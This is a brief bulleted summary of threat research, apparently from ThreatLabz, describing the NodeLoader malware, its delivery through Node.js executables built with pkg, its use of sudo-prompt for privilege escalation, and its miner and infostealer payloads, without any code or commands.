• ThreatLabz has observed threat actors deploying NodeLoader using the Node Package Manager (NPM) pkg module to turn Node.js code into standalone Windows executable files for malicious purposes.
• The threat actors employ social engineering and anti-evasion techniques to deliver NodeLoader undetected.
• NodeLoader uses a module called sudo-prompt, a publicly available tool on GitHub and NPM, for privilege escalation.
• The malware delivered by NodeLoader includes cryptocurrency miners and information stealers.